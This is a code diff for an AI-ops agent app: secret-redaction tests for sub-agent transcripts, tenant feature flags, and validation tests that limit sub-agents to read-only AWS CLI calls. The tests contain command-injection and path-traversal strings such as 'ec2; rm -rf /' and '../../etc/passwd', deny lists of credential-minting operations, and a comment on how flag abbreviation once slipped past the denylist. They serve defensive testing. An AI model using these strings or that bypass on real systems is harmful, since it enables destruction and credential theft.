+        const [out] = redactTranscript([entry(lambdaConfig)])!;
+        const parsed = JSON.parse(out.text);
+
+        expect(parsed.Environment.Variables.DB_PASSWORD).toBe(REDACTED);
+        // Redacted by LOCATION: we cannot know which arbitrary env var name is a secret.
+        expect(parsed.Environment.Variables.LOG_LEVEL).toBe(REDACTED);
+        // The operator still needs to see that the variable exists.
+        expect(Object.keys(parsed.Environment.Variables)).toEqual(['DB_PASSWORD', 'LOG_LEVEL']);
+        expect(parsed.FunctionName).toBe('api-worker');
+    });
+
+    it('leaks the plaintext value nowhere in the output', () => {
+        expect(flatten(redactTranscript([entry(lambdaConfig)]))).not.toContain('hunter2');
+    });
+});
+
+describe('redactTranscript — secret-shaped keys anywhere in the document', () => {
+    it.each([
+        ['apiKey', '{"credentials":{"apiKey":"sk_live_abc"}}', 'sk_live_abc'],
+        ['api_key', '{"api_key":"sk_live_abc"}', 'sk_live_abc'],
+        ['api-key', '{"api-key":"sk_live_abc"}', 'sk_live_abc'],
+        ['PASSWORD', '{"PASSWORD":"hunter2"}', 'hunter2'],
+        ['passwd', '{"passwd":"hunter2"}', 'hunter2'],
+        ['clientSecret', '{"clientSecret":"shh"}', 'shh'],
+        ['authToken', '{"authToken":"abc123"}', 'abc123'],
+        ['Credential', '{"Credential":"abc123"}', 'abc123'],
+        ['private_key', '{"private_key":"-----BEGIN RSA-----"}', 'BEGIN RSA'],
+        ['SessionToken', '{"SessionToken":"IQoJb3JpZ2lu"}', 'IQoJb3JpZ2lu'],
+    ])('redacts %s case-insensitively', (_label, json, plaintext) => {
+        expect(flatten(redactTranscript([entry(json)]))).not.toContain(plaintext);
+    });
+
+    it('walks nested arrays and objects', () => {
+        const [out] = redactTranscript([entry('{"items":[{"token":"abc"}]}')])!;
+        expect(JSON.parse(out.text).items[0].token).toBe(REDACTED);
+    });
+});
+
+describe('redactTranscript — ordinary values survive', () => {
+    it('leaves a realistic non-secret payload byte-identical', () => {
+        const payload = JSON.stringify({
+            FunctionName: 'api-worker',
+            FunctionArn: 'arn:aws:lambda:us-east-1:123456789012:function:api-worker',
+            Runtime: 'nodejs20.x',
+            MemorySize: 512,
+            Timeout: 30,
+            LastModified: '2026-07-26T10:15:00.000+0000',
+            Instances: [{ InstanceId: 'i-0abc123def4567890', State: 'running' }],
+            Tags: { Environment: 'prod', Owner: 'platform' },
+        });
+
+        const input: Entry[] = [{ kind: 'tool', name: 'aws_read', text: payload }];
+        const [out] = redactTranscript(input)!;
+
+        expect(out.text).toBe(payload);
+        expect(out).toEqual(input[0]);
+    });
+
+    it('does not touch an `Environment` that has no `Variables`', () => {
+        const payload = JSON.stringify({ Environment: { Region: 'us-east-1' } });
+        expect(redactTranscript([entry(payload)])![0].text).toBe(payload);
+    });
+
+    it('leaves plain narration alone', () => {
+        const text = 'Checked 3 accounts; 2 instances are oversized in us-east-1.';
+        expect(redactTranscript([{ kind: 'ai', text }])![0].text).toBe(text);
+    });
+});
+
+describe('redactTranscript — non-JSON text', () => {
+    it('scrubs shell-style KEY=value assignments', () => {
+        const out = redactTranscript([entry('export DB_PASSWORD=hunter2 && ./run.sh')])!;
+        expect(out[0].text).not.toContain('hunter2');
+        expect(out[0].text).toContain('DB_PASSWORD');
+    });
+
+    it('scrubs `key: value` prose', () => {
+        expect(flatten(redactTranscript([entry('api_key: sk_live_abc')]))).not.toContain('sk_live_abc');
+    });
+
+    it('scrubs quoted JSON-ish fragments that never parsed', () => {
+        expect(flatten(redactTranscript([entry('trailing junk "secret": "shh" more')])))
+            .not.toContain('shh');
+    });
+});
+
+describe('redactTranscript — malformed and hostile input', () => {
+    it('does not throw and does not pass a secret through truncated JSON', () => {
+        let out: Entry[] | null = null;
+        expect(() => { out = redactTranscript([entry('{"password":"hunter2"')]); }).not.toThrow();
+        expect(flatten(out)).not.toContain('hunter2');
+    });
+
+    it('returns null for null and undefined for undefined', () => {
+        expect(redactTranscript(null)).toBeNull();
+        expect(redactTranscript(undefined)).toBeUndefined();
+    });
+
+    it('returns an empty transcript unchanged', () => {
+        expect(redactTranscript([])).toEqual([]);
+    });
+
+    it('survives a self-referential object without hanging', () => {
+        const cyclic: Record<string, unknown> = { password: 'hunter2' };
+        cyclic.self = cyclic;
+
+        let out: unknown;
+        expect(() => { out = redactTranscript(cyclic); }).not.toThrow();
+        // The cycle must have been broken, so the result is serialisable...
+        expect(() => JSON.stringify(out)).not.toThrow();
+        // ...and the secret must not be in it.
+        expect(JSON.stringify(out)).not.toContain('hunter2');
+    });
+
+    it('survives pathologically deep nesting', () => {
+        let deep: Record<string, unknown> = { token: 'abc' };
+        for (let i = 0; i < 500; i++) deep = { nested: deep };
+
+        expect(() => redactTranscript([entry(JSON.stringify(deep))])).not.toThrow();
+        expect(flatten(redactTranscript([entry(JSON.stringify(deep))]))).not.toContain('"abc"');
+    });
+});

--- a/apps/web-ui/lib/agent/__tests__/subagent-redact.test.ts
+++ b/apps/web-ui/lib/agent/__tests__/subagent-redact.test.ts
@@ -62,6 +62,110 @@ describe('redactTranscript — secret-shaped keys anywhere in the document', () 
     });
 });
 
+describe('redactTranscript — sibling name/value pairs', () => {
+    // `cloudformation describe-stacks` is allowlisted in aws-read-tool.ts and is
+    // exactly what an audit sub-agent gets pointed at. Its secret lives in a
+    // `ParameterValue` — a key that is not secret-shaped — named by a SIBLING
+    // field, so key-name matching is structurally blind to it. CloudFormation
+    // masks `NoEcho: true` parameters, but a non-NoEcho `DBPassword` is common
+    // and is the very misconfiguration the audit is looking for.
+    const describeStacks = JSON.stringify({
+        Stacks: [{
+            StackName: 'payments-prod',
+            Parameters: [
+                { ParameterKey: 'DBPassword', ParameterValue: 'hunter2' },
+                { ParameterKey: 'InstanceType', ParameterValue: 't3.medium' },
+            ],
+            Outputs: [{ OutputKey: 'DbUrl', OutputValue: 'postgres://u:s3cr3t!@db.internal:5432/x' }],
+        }],
+    });
+
+    const stack = () => JSON.parse(redactTranscript([entry(describeStacks)])![0].text).Stacks[0];
+
+    it('redacts ParameterValue when the sibling ParameterKey names a secret', () => {
+        expect(stack().Parameters[0].ParameterValue).toBe(REDACTED);
+    });
+
+    it('keeps the sibling name so the operator sees WHICH parameter was withheld', () => {
+        expect(stack().Parameters.map((p: { ParameterKey: string }) => p.ParameterKey))
+            .toEqual(['DBPassword', 'InstanceType']);
+        expect(stack().Outputs[0].OutputKey).toBe('DbUrl');
+        expect(stack().StackName).toBe('payments-prod');
+    });
+
+    it('leaves an ordinary parameter untouched', () => {
+        // A redactor that eats `t3.medium` fails the operator as badly as one that leaks.
+        expect(stack().Parameters[1].ParameterValue).toBe('t3.medium');
+    });
+
+    it('leaks neither secret anywhere in the output', () => {
+        const flat = flatten(redactTranscript([entry(describeStacks)]));
+        expect(flat).not.toContain('hunter2');
+        expect(flat).not.toContain('s3cr3t!');
+    });
+
+    it('handles the lowercase {name,value} form used by container env definitions', () => {
+        const payload = JSON.stringify({
+            environment: [
+                { name: 'DB_PASSWORD', value: 'hunter2' },
+                { name: 'LOG_LEVEL', value: 'debug' },
+            ],
+        });
+        const out = JSON.parse(redactTranscript([entry(payload)])![0].text);
+
+        expect(out.environment[0].value).toBe(REDACTED);
+        expect(out.environment[0].name).toBe('DB_PASSWORD');
+        // Named by the operator, not secret-shaped: it must survive.
+        expect(out.environment[1].value).toBe('debug');
+    });
+
+    it('handles the bare {Key,Value} form', () => {
+        const out = JSON.parse(redactTranscript([entry('{"Key":"ApiToken","Value":"abc123"}')])![0].text);
+        expect(out.Value).toBe(REDACTED);
+        expect(out.Key).toBe('ApiToken');
+    });
+
+    it('does not redact a Value whose sibling name is innocuous', () => {
+        // Tags are the highest-traffic {Key,Value} shape in AWS responses.
+        const payload = JSON.stringify({ Tags: [{ Key: 'Name', Value: 'web-1' }, { Key: 'Owner', Value: 'platform' }] });
+        expect(redactTranscript([entry(payload)])![0].text).toBe(payload);
+    });
+
+    it('applies the sibling rule inside the regex fallback path', () => {
+        // Truncated JSON never parses, so the structural walk cannot run.
+        const truncated = '{"Parameters":[{"ParameterKey":"DBPassword","ParameterValue":"hunter2"},{"Param';
+        expect(flatten(redactTranscript([entry(truncated)]))).not.toContain('hunter2');
+    });
+});
+
+describe('redactTranscript — credentials embedded in URLs', () => {
+    it('rewrites scheme://user:password@host, keeping user and host', () => {
+        const out = JSON.parse(redactTranscript([entry('{"DbUrl":"postgres://admin:letmein@db.internal:5432/app"}')])![0].text);
+        expect(out.DbUrl).toBe(`postgres://admin:${REDACTED}@db.internal:5432/app`);
+    });
+
+    it('rewrites a credential URL in prose that never parsed as JSON', () => {
+        // This is the report path: LLM-authored prose, no key to match on.
+        const out = redactTranscript('The worker uses mongodb://svc:p4ssw0rd@cluster0.mongodb.net/prod');
+        expect(out).not.toContain('p4ssw0rd');
+        expect(out).toContain('cluster0.mongodb.net/prod');
+    });
+
+    it('handles an empty user segment', () => {
+        expect(redactTranscript('redis://:t0psecret@cache.internal:6379')).not.toContain('t0psecret');
+    });
+
+    it('leaves credential-free URLs and ARNs alone', () => {
+        const payload = JSON.stringify({
+            Endpoint: 'https://console.aws.amazon.com/ec2/home?region=us-east-1',
+            Repo: 'ssh://git@github.com/acme/infra.git',
+            Bucket: 's3://nucleus-artifacts/builds/1.2.3',
+            Arn: 'arn:aws:secretsmanager:us-east-1:123456789012:secret:prod/db-AbCdEf',
+        });
+        expect(redactTranscript([entry(payload)])![0].text).toBe(payload);
+    });
+});
+
 describe('redactTranscript — ordinary values survive', () => {
     it('leaves a realistic non-secret payload byte-identical', () => {
         const payload = JSON.stringify({

--- a/apps/web-ui/lib/agent/agent-shared.ts
+++ b/apps/web-ui/lib/agent/agent-shared.ts
@@ -857,6 +857,9 @@ export interface GraphConfig {
     // skill catalog from prompts and drops the load_skill tool — the agent can
     // then only use a skill the user pinned manually.
     autoLoadSkills?: boolean;
+    /** Live sub-agent progress sink. Set by the chat route so dispatch_agent
+     *  activity can be streamed as data-subagent parts. */
+    onSubagentEvent?: (event: import('./dispatch-agent-tool').SubagentEvent) => void;
 }
 
 // --- MCP Integration ---

--- a/apps/web-ui/lib/agent/aiops-features.test.ts
+++ b/apps/web-ui/lib/agent/aiops-features.test.ts
@@ -1,0 +1,62 @@
+import { describe, it, expect, vi } from 'vitest';
+
+vi.mock('@/lib/tenant-config-service', () => ({ TenantConfigService: { getConfig: vi.fn() } }));
+import { TenantConfigService } from '@/lib/tenant-config-service';
+import {
+    DEFAULT_FEATURES, FEATURE_BOUNDS, clampFeatures, validateFeaturesInput,
+    getAiopsFeatures, resolveAiopsFeatures, primeAiopsFeaturesCache,
+} from './aiops-features';
+
+describe('clampFeatures', () => {
+    it('null input → defaults (identical to the historical env-unset behavior)', () => {
+        expect(clampFeatures(null)).toEqual(DEFAULT_FEATURES);
+    });
+
+    it('clamps numerics into bounds and ignores junk types', () => {
+        const out = clampFeatures({
+            chatTriageEnabled: false,
+            maxIterations: 9999,
+            skillSynthesisMinRules: 0,
+            episodicMemoryEnabled: 'yes' as never,
+        });
+        expect(out.chatTriageEnabled).toBe(false);
+        expect(out.maxIterations).toBe(FEATURE_BOUNDS.maxIterations.max);
+        expect(out.skillSynthesisMinRules).toBe(FEATURE_BOUNDS.skillSynthesisMinRules.min);
+        expect(out.episodicMemoryEnabled).toBe(true); // junk → default
+    });
+});
+
+describe('validateFeaturesInput', () => {
+    it('accepts a partial valid payload', () => {
+        expect(validateFeaturesInput({ chatTriageEnabled: true, maxIterations: 20 })).toBeNull();
+    });
+    it('rejects non-objects, wrong types, and out-of-bounds values', () => {
+        expect(validateFeaturesInput(null)).toMatch(/object/);
+        expect(validateFeaturesInput({ chatTriageEnabled: 'true' })).toMatch(/boolean/);
+        expect(validateFeaturesInput({ maxIterations: 3.5 })).toMatch(/integer/);
+        expect(validateFeaturesInput({ maxIterations: 999 })).toMatch(/between/);
+    });
+});
+
+describe('cache', () => {
+    it('sync read returns defaults cold, primed value after, and no tenant → defaults', () => {
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue(null as never);
+        expect(getAiopsFeatures()).toEqual(DEFAULT_FEATURES);
+        expect(getAiopsFeatures('t-cold')).toEqual(DEFAULT_FEATURES);
+        primeAiopsFeaturesCache('t-primed', { ...DEFAULT_FEATURES, chatTriageEnabled: false });
+        expect(getAiopsFeatures('t-primed').chatTriageEnabled).toBe(false);
+    });
+
+    it('resolveAiopsFeatures reads the store fresh and clamps', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockResolvedValue({ maxIterations: 9999 } as never);
+        const out = await resolveAiopsFeatures('t-fresh');
+        expect(out.maxIterations).toBe(FEATURE_BOUNDS.maxIterations.max);
+        // and the sync cache is primed by the resolve
+        expect(getAiopsFeatures('t-fresh').maxIterations).toBe(FEATURE_BOUNDS.maxIterations.max);
+    });
+
+    it('a store failure degrades to defaults instead of throwing', async () => {
+        vi.mocked(TenantConfigService.getConfig).mockRejectedValue(new Error('db down'));
+        await expect(resolveAiopsFeatures('t-err')).resolves.toEqual(DEFAULT_FEATURES);
+    });
+});

--- a/apps/web-ui/lib/agent/aiops-features.ts
+++ b/apps/web-ui/lib/agent/aiops-features.ts
@@ -1,0 +1,154 @@
+/**
+ * AI Ops feature settings — tenant-configured from the AI Ops console
+ * ("AI Ops settings" dialog), with NO environment-variable dependency.
+ *
+ * Every flag here used to be an env kill-switch (CHAT_TRIAGE_ENABLED,
+ * *_MEMORY_ENABLED, AUTO_SKILL_CREATION_ENABLED, …). They are now rows on the
+ * 'aiops-features' tenant-config key; the defaults below reproduce the old
+ * env-unset behavior exactly (everything on, minRules 3, 30 iterations), so a
+ * tenant that never opens the settings dialog sees no change.
+ *
+ * READ PATH: the gates that consume these flags (triage, memory nodes, the
+ * agent loops) are hot and often synchronous, so reads go through a small
+ * per-tenant TTL cache:
+ *   - getAiopsFeatures(tenantId)  — SYNC. Returns the cached value (or the
+ *     defaults on a cold cache) and kicks off a background refresh when stale.
+ *     A toggle flipped in the UI therefore applies within CACHE_TTL_MS on other
+ *     replicas / later runs — good enough for feature flags, and it keeps the
+ *     gates free of async plumbing.
+ *   - resolveAiopsFeatures(tenantId) — async, always-fresh; used by the
+ *     settings API and at graph construction (which is already async).
+ */
+import { TenantConfigService } from '@/lib/tenant-config-service';
+
+export const AIOPS_FEATURES_KEY = 'aiops-features';
+
+export interface AiopsFeatureConfig {
+    /** One cheap classifier call routes chat messages direct-reply vs full agent graph (and auto-picks the skill). */
+    chatTriageEnabled: boolean;
+    /** In-session compaction for long runs (summary folding + budget-aware window). */
+    workingMemoryEnabled: boolean;
+    /** Distill one episode per tool-using run; replayed as few-shot experience. */
+    episodicMemoryEnabled: boolean;
+    /** Learn operating rules from corrections/failures; injected as "Operating rules (learned)". */
+    proceduralMemoryEnabled: boolean;
+    /** LLM judge (ADD/UPDATE/SUPERSEDE/…) applied when saving memories. */
+    memoryReconcileEnabled: boolean;
+    /** Autonomous synthesis of sys-<domain> skills from matured procedural rules. */
+    autoSkillCreationEnabled: boolean;
+    /** Rules whose accessCount reaches this are "matured". */
+    autoSkillMaturityThreshold: number;
+    /** Matured rules a domain needs before a sys- skill is synthesized. */
+    skillSynthesisMinRules: number;
+    /** Executor/generator loop cap for both the planning and fast agents. */
+    maxIterations: number;
+}
+
+type NumericKey = 'autoSkillMaturityThreshold' | 'skillSynthesisMinRules' | 'maxIterations';
+
+export const FEATURE_BOUNDS: Record<NumericKey, { min: number; max: number; default: number }> = {
+    autoSkillMaturityThreshold: { min: 1, max: 10, default: 3 },
+    skillSynthesisMinRules:     { min: 1, max: 10, default: 3 },
+    maxIterations:              { min: 5, max: 50, default: 30 },
+};
+
+const BOOLEAN_KEYS = [
+    'chatTriageEnabled', 'workingMemoryEnabled', 'episodicMemoryEnabled',
+    'proceduralMemoryEnabled', 'memoryReconcileEnabled', 'autoSkillCreationEnabled',
+] as const;
+
+export const DEFAULT_FEATURES: AiopsFeatureConfig = Object.freeze({
+    chatTriageEnabled: true,
+    workingMemoryEnabled: true,
+    episodicMemoryEnabled: true,
+    proceduralMemoryEnabled: true,
+    memoryReconcileEnabled: true,
+    autoSkillCreationEnabled: true,
+    autoSkillMaturityThreshold: FEATURE_BOUNDS.autoSkillMaturityThreshold.default,
+    skillSynthesisMinRules: FEATURE_BOUNDS.skillSynthesisMinRules.default,
+    maxIterations: FEATURE_BOUNDS.maxIterations.default,
+});
+
+/** Clamp on READ, like the sub-agent budget: a stored row never widens bounds. */
+export function clampFeatures(input: Partial<AiopsFeatureConfig> | null): AiopsFeatureConfig {
+    const out: Record<string, unknown> = {};
+    for (const key of BOOLEAN_KEYS) {
+        out[key] = typeof input?.[key] === 'boolean' ? input[key] : DEFAULT_FEATURES[key];
+    }
+    for (const key of Object.keys(FEATURE_BOUNDS) as NumericKey[]) {
+        const spec = FEATURE_BOUNDS[key];
+        const raw = Number(input?.[key]);
+        const value = Number.isFinite(raw) ? Math.round(raw) : spec.default;
+        out[key] = Math.min(spec.max, Math.max(spec.min, value));
+    }
+    return out as unknown as AiopsFeatureConfig;
+}
+
+/** Validate a PUT payload. Returns an error string for a 400, or null. */
+export function validateFeaturesInput(input: unknown): string | null {
+    if (!input || typeof input !== 'object' || Array.isArray(input)) {
+        return 'features must be an object';
+    }
+    const body = input as Record<string, unknown>;
+    for (const key of BOOLEAN_KEYS) {
+        if (body[key] !== undefined && typeof body[key] !== 'boolean') {
+            return `${key} must be a boolean`;
+        }
+    }
+    for (const key of Object.keys(FEATURE_BOUNDS) as NumericKey[]) {
+        if (body[key] === undefined) continue;
+        if (typeof body[key] !== 'number' || !Number.isInteger(body[key] as number)) {
+            return `${key} must be an integer`;
+        }
+        const spec = FEATURE_BOUNDS[key];
+        const value = body[key] as number;
+        if (value < spec.min || value > spec.max) {
+            return `${key} must be between ${spec.min} and ${spec.max}`;
+        }
+    }
+    return null;
+}
+
+// ---------------------------------------------------------------------------
+// Per-tenant cache
+// ---------------------------------------------------------------------------
+
+const CACHE_TTL_MS = 30_000;
+const cache = new Map<string, { value: AiopsFeatureConfig; at: number }>();
+const inflight = new Set<string>();
+
+async function refresh(tenantId: string): Promise<AiopsFeatureConfig> {
+    const stored = await TenantConfigService
+        .getConfig<Partial<AiopsFeatureConfig>>(AIOPS_FEATURES_KEY, tenantId)
+        .catch(() => null);
+    const value = clampFeatures(stored);
+    cache.set(tenantId, { value, at: Date.now() });
+    return value;
+}
+
+/**
+ * SYNC read for hot gates. Cold cache returns DEFAULT_FEATURES (identical to
+ * the historical env-unset behavior) while a background refresh populates it.
+ * Never throws: a config-store failure degrades to defaults.
+ */
+export function getAiopsFeatures(tenantId?: string | null): AiopsFeatureConfig {
+    if (!tenantId) return DEFAULT_FEATURES;
+    const hit = cache.get(tenantId);
+    if ((!hit || Date.now() - hit.at > CACHE_TTL_MS) && !inflight.has(tenantId)) {
+        inflight.add(tenantId);
+        void refresh(tenantId)
+            .catch(() => { /* degraded to defaults */ })
+            .finally(() => inflight.delete(tenantId));
+    }
+    return hit?.value ?? DEFAULT_FEATURES;
+}
+
+/** Always-fresh read; primes the sync cache. For the settings API + graph factories. */
+export async function resolveAiopsFeatures(tenantId: string): Promise<AiopsFeatureConfig> {
+    return refresh(tenantId);
+}
+
+/** Prime the cache after a PUT so the saving replica applies the change immediately. */
+export function primeAiopsFeaturesCache(tenantId: string, value: AiopsFeatureConfig): void {
+    cache.set(tenantId, { value, at: Date.now() });
+}

--- a/apps/web-ui/lib/agent/auto-skill-select.ts
+++ b/apps/web-ui/lib/agent/auto-skill-select.ts
@@ -24,7 +24,7 @@ export async function autoSelectSkill(params: {
         const sys = new SystemMessage(
             `You select the single most relevant skill for a user request, or none.\n\n${catalog}\n\n` +
             `Return ONLY a JSON object: {"skillId": "<slug>" | null, "reasoning": "<one short line>"}\n` +
-            `Rules: pick a skill ONLY when the request clearly matches its description. When in doubt, return null.`,
+            `Rules: selecting a skill is the DEFAULT. Match on the request's domain (cost, EC2, Jira, security, …), not exact wording — a skill whose description covers the task's subject area is a match. Return null ONLY when nothing in the catalog is even loosely related.`,
         );
         const resp = await reflector.invoke([sys, new HumanMessage(params.message.slice(0, 4000))]);
         const content = contentToText(resp.content);

--- a/apps/web-ui/lib/agent/aws-credentials-tool.ts
+++ b/apps/web-ui/lib/agent/aws-credentials-tool.ts
@@ -2,7 +2,7 @@ import { tool } from '@langchain/core/tools';
 import { z } from 'zod';
 import { STSClient, AssumeRoleCommand } from '@aws-sdk/client-sts';
 import { AccountService } from '../account-service';
-import { createSessionProfile } from './session-manager';
+import { getOrCreateSessionProfile } from './session-manager';
 import { env } from '@/env';
 
 /**
@@ -97,28 +97,25 @@ export function createGetAwsCredentialsTool(tenantId: string) {
                     });
                 }
 
-                // 2. Assume the role to get temporary credentials
-                const { credentials, expiration } = await assumeRoleForAccount(
-                    account.roleArn,
-                    account.externalId
-                );
-
-                // 3. Determine region (use first region from account, or default)
+                // 2/3/4. Resolve region, then get a cached-or-fresh session profile.
+                // getOrCreateSessionProfile only calls STS when there is no live
+                // profile left for this (tenant, account) pair.
                 const region = account.regions?.[0] || env.AWS_REGION || env.NEXT_PUBLIC_AWS_REGION || 'us-east-1';
 
-                // 4. Create session profile in the tenant-isolated credentials file
-                const profile = await createSessionProfile(
-                    accountId,
-                    {
+                const profile = await getOrCreateSessionProfile(accountId, tenantId, async () => {
+                    const { credentials } = await assumeRoleForAccount(
+                        account.roleArn!,
+                        account.externalId,
+                    );
+                    return {
                         accessKeyId: credentials.AccessKeyId!,
                         secretAccessKey: credentials.SecretAccessKey!,
                         sessionToken: credentials.SessionToken!,
-                        region: region
-                    },
-                    tenantId
-                );
+                        region,
+                    };
+                });
 
-                console.log(`[Tool] Created profile: ${profile.profileName} for account: ${accountId}`);
+                console.log(`[Tool] Profile: ${profile.profileName} for account: ${accountId}`);
                 console.log(`[Tool] Profile expires at: ${profile.expiresAt.toISOString()}`);
 
                 return JSON.stringify({

--- a/apps/web-ui/lib/agent/aws-read-tool.test.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.test.ts
@@ -1,0 +1,69 @@
+import { describe, it, expect } from 'vitest';
+import { validateAwsReadRequest, buildAwsReadArgv } from './aws-read-tool';
+
+const ok = { service: 'ec2', operation: 'describe-instances' };
+
+describe('validateAwsReadRequest', () => {
+    it('accepts a read operation', () => {
+        expect(validateAwsReadRequest(ok)).toBeNull();
+    });
+
+    it('refuses a mutating operation', () => {
+        for (const operation of ['terminate-instances', 'delete-bucket', 'sync', 'cp', 'run-instances']) {
+            expect(validateAwsReadRequest({ ...ok, operation })).toMatch(/not a read-only operation/);
+        }
+    });
+
+    it('refuses credential-minting reads that match the read prefix', () => {
+        for (const operation of [
+            'get-session-token', 'get-federation-token', 'get-login-password',
+            'get-token', 'get-password-data', 'get-cluster-credentials',
+        ]) {
+            expect(validateAwsReadRequest({ ...ok, service: 'sts', operation }))
+                .toMatch(/credentials or mutates/);
+        }
+    });
+
+    it('refuses flags that reach outside the request', () => {
+        for (const flag of ['--endpoint-url', '--cli-input-json', '--outfile', '--no-sign-request']) {
+            expect(validateAwsReadRequest({ ...ok, params: { [flag]: 'x' } }))
+                .toMatch(/not available to sub-agents/);
+        }
+    });
+
+    it('refuses malformed identifiers rather than passing them through', () => {
+        expect(validateAwsReadRequest({ ...ok, service: 'ec2; rm -rf /' })).toMatch(/not a valid AWS service/);
+        expect(validateAwsReadRequest({ ...ok, operation: 'describe-instances && pulumi destroy' })).toMatch(/not a valid operation/);
+        expect(validateAwsReadRequest({ ...ok, region: 'us-east-1$(id)' })).toMatch(/invalid region/);
+        expect(validateAwsReadRequest({ ...ok, profile: '../../etc/passwd' })).toMatch(/invalid profile/);
+        expect(validateAwsReadRequest({ ...ok, params: { 'notaflag': 'x' } })).toMatch(/not a valid --flag/);
+    });
+});
+
+describe('buildAwsReadArgv', () => {
+    it('emits service, operation, flags and json output — never a shell string', () => {
+        expect(buildAwsReadArgv({
+            service: 'ec2', operation: 'describe-instances',
+            region: 'us-east-1', profile: 'nucleus_agent_1',
+            params: { '--instance-ids': 'i-123' },
+        })).toEqual([
+            'ec2', 'describe-instances', '--region', 'us-east-1',
+            '--profile', 'nucleus_agent_1', '--instance-ids', 'i-123',
+            '--output', 'json',
+        ]);
+    });
+
+    it('emits no positional arguments, so an outfile cannot be supplied', () => {
+        const argv = buildAwsReadArgv({ service: 's3api', operation: 'get-object', params: { '--bucket': 'b', '--key': 'k' } });
+        // Every element after the leading service+operation is a flag or a flag's value.
+        expect(argv.slice(2).filter((t, i, a) => !t.startsWith('--') && !a[i - 1]?.startsWith('--'))).toEqual([]);
+    });
+
+    it('treats injection attempts as inert argv data', () => {
+        // These never reach a shell, so they are values — not code. Validation
+        // refuses them anyway; this pins that argv construction does not concatenate.
+        const argv = buildAwsReadArgv({ service: 'ec2', operation: 'describe-instances', params: { '--filters': 'a; rm -rf /' } });
+        expect(argv).toContain('a; rm -rf /');
+        expect(argv.join(' ')).not.toContain('&&');
+    });
+});

--- a/apps/web-ui/lib/agent/aws-read-tool.test.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.test.ts
@@ -1,69 +1,208 @@
 import { describe, it, expect } from 'vitest';
-import { validateAwsReadRequest, buildAwsReadArgv } from './aws-read-tool';
+import { validateAwsReadRequest, buildAwsReadArgv, ALLOWED_FLAGS, ALLOWED_OPS } from './aws-read-tool';
+import { isReadOnlyForSubagent, filterReadOnlyTools } from './subagent';
 
 const ok = { service: 'ec2', operation: 'describe-instances' };
 
-describe('validateAwsReadRequest', () => {
-    it('accepts a read operation', () => {
-        expect(validateAwsReadRequest(ok)).toBeNull();
-    });
+describe('validateAwsReadRequest — service/operation allowlist', () => {
+    it('accepts a permitted pair', () => expect(validateAwsReadRequest(ok)).toBeNull());
 
-    it('refuses a mutating operation', () => {
-        for (const operation of ['terminate-instances', 'delete-bucket', 'sync', 'cp', 'run-instances']) {
-            expect(validateAwsReadRequest({ ...ok, operation })).toMatch(/not a read-only operation/);
+    it('refuses a service that is not allowlisted', () => {
+        for (const service of ['redshift', 'sso', 'cognito-identity', 'secretsmanager', 'ssm', 'gamelift', 'configure', 'ddb']) {
+            expect(validateAwsReadRequest({ service, operation: 'get-x' })).toMatch(/not available to sub-agents|not a permitted/);
         }
     });
 
-    it('refuses credential-minting reads that match the read prefix', () => {
-        for (const operation of [
-            'get-session-token', 'get-federation-token', 'get-login-password',
-            'get-token', 'get-password-data', 'get-cluster-credentials',
-        ]) {
-            expect(validateAwsReadRequest({ ...ok, service: 'sts', operation }))
-                .toMatch(/credentials or mutates/);
-        }
+    it('refuses credential-returning operations even on allowlisted services', () => {
+        // These defeated the previous denylist by simply not being on it.
+        expect(validateAwsReadRequest({ service: 'sts', operation: 'get-session-token' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'sts', operation: 'get-federation-token' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'ec2', operation: 'get-console-output' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'ec2', operation: 'get-password-data' })).toMatch(/not a permitted/);
+        expect(validateAwsReadRequest({ service: 'iam', operation: 'get-credential-report' })).toMatch(/not a permitted/);
     });
 
-    it('refuses flags that reach outside the request', () => {
-        for (const flag of ['--endpoint-url', '--cli-input-json', '--outfile', '--no-sign-request']) {
-            expect(validateAwsReadRequest({ ...ok, params: { [flag]: 'x' } }))
-                .toMatch(/not available to sub-agents/);
+    it('refuses the file-write primitive', () => {
+        expect(validateAwsReadRequest({ service: 's3api', operation: 'get-object' })).toMatch(/not a permitted/);
+    });
+
+    it('refuses mutations', () => {
+        for (const operation of ['terminate-instances', 'delete-bucket', 'run-instances', 'sync', 'cp']) {
+            expect(validateAwsReadRequest({ ...ok, operation })).toMatch(/not a permitted/);
         }
     });
 
     it('refuses malformed identifiers rather than passing them through', () => {
-        expect(validateAwsReadRequest({ ...ok, service: 'ec2; rm -rf /' })).toMatch(/not a valid AWS service/);
-        expect(validateAwsReadRequest({ ...ok, operation: 'describe-instances && pulumi destroy' })).toMatch(/not a valid operation/);
+        expect(validateAwsReadRequest({ service: 'ec2; rm -rf /', operation: 'describe-instances' })).toMatch(/not a permitted AWS service/);
         expect(validateAwsReadRequest({ ...ok, region: 'us-east-1$(id)' })).toMatch(/invalid region/);
         expect(validateAwsReadRequest({ ...ok, profile: '../../etc/passwd' })).toMatch(/invalid profile/);
-        expect(validateAwsReadRequest({ ...ok, params: { 'notaflag': 'x' } })).toMatch(/not a valid --flag/);
+    });
+
+    it('refuses a service name that resolves to an inherited Object property', () => {
+        // ALLOWED_OPS is a plain object, so a bare index would return the Object
+        // constructor here — truthy, with no .has — and throw a TypeError out of a
+        // function whose contract is to RETURN a refusal. validate() is called
+        // outside the tool's try/catch, so that turned a refusal into a crash.
+        expect(validateAwsReadRequest({ service: 'constructor', operation: 'get-x' })).toMatch(/not available to sub-agents/);
+    });
+
+    it('refuses an operation that is not a string', () => {
+        expect(validateAwsReadRequest({ ...ok, operation: undefined as never })).toMatch(/not a permitted read-only operation/);
+    });
+});
+
+describe('validateAwsReadRequest — flag allowlist and arity', () => {
+    it('refuses any flag that is not allowlisted, including abbreviations', () => {
+        // argparse has allow_abbrev=True, which defeated the previous denylist:
+        // --endpoint was accepted for the denied --endpoint-url and turned the CLI
+        // into an unauthenticated downloader.
+        for (const flag of ['--endpoint-url', '--endpoint', '--endpoint-ur', '--cli-input-json',
+                            '--cli-input-jso', '--no-sign-request', '--no-sign-reques', '--debug',
+                            '--debu', '--ca-bundle', '--ca-bundl', '--profile', '--region', '--output']) {
+            expect(validateAwsReadRequest({ ...ok, params: { [flag]: 'x' } })).toMatch(/not a permitted flag/);
+        }
+    });
+
